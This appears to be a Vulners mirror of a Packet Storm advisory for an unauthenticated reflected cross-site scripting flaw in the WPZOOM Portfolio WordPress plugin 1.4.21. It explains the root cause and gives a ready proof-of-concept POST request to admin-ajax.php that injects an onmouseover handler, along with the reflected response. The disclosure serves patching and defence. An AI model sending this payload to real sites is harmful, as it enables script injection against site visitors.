Lucene search
K

📄 WordPress WPZOOM Portfolio 1.4.21 Cross Site Scripting

🗓️ 07 Jul 2026 00:00:00Reported by Kent ApostolType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 9 Views

Unauthenticated reflected XSS exists in WordPress WPZOOM Portfolio 1.4.21 via wpzoom_load_more_items.

Related
Code
# Exploit Title: WordPress Plugin WPZOOM Portfolio 1.4.21 -  Reflected Cross-Site Scripting (XSS)
    # Date: June 10, 2026
    # Exploit Author: Kent Apostol
    # Vendor Homepage: https://wpzoom.com
    # Software Link: https://wordpress.org
    # Version: <= 1.4.21
    # Tested on: WordPress 6.x
    # CVE: CVE-2026-49069
    
    Vulnerability Description:
    The WPZOOM Portfolio plugin for WordPress is vulnerable to unauthenticated reflected Cross-Site Scripting via the `wpzoom_load_more_items` AJAX action. The handler is registered for unauthenticated users through `wp_ajax_nopriv_wpzoom_load_more_items` and performs no nonce validation or privilege checks. 
    
    The application reads the `posts_data` POST parameter, passes it through `sanitize_text_field()`, and JSON-decodes it into an array which is then merged into `$args` via `wp_parse_args()`. The attacker-controlled `class` key from this array is assigned to `$args['class']` and concatenated directly into multiple single-quoted HTML attributes within `items_html()` (e.g., `<li class='{$class}_item ...'>`, `<article class='{$class}_item-wrap ...'>`, `<h3 class='{$class}_item-title'>`) without any context-aware output escaping like `esc_attr()`.
    
    Because `sanitize_text_field()` strips angle brackets (`<`, `>`) but preserves single quotes (`'`), an attacker can break out of the HTML attribute string and inject arbitrary attributes, including malicious JavaScript event handlers. The payload executes when the underlying query returns at least one published portfolio item.
    
    Proof of Concept (PoC):
    
    Step 1: As an unauthenticated user, send the following POST request to the target site:
    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: TARGET
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 111
    
    action=wpzoom_load_more_items&offset=0&posts_data={"source":"post","class":"x' onmouseover='alert(document.domain)' y='"}
    
    
    Step 2: Review the HTTP response to verify that the single quote has successfully broken out of the class attribute structure to inject the event handler:
    
    <li class='x' onmouseover='alert(document.domain)' y='_item ...' data-category='1'>
    
    
    Step 3: When rendered in a victim's browser, triggering the event handler (hovering over the loaded portfolio item) executes the JavaScript code.

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Jul 2026 00:00Current
5.4Medium risk
Vulners AI Score5.4
CVSS 3.17.1
EPSS0.00142
SSVC
9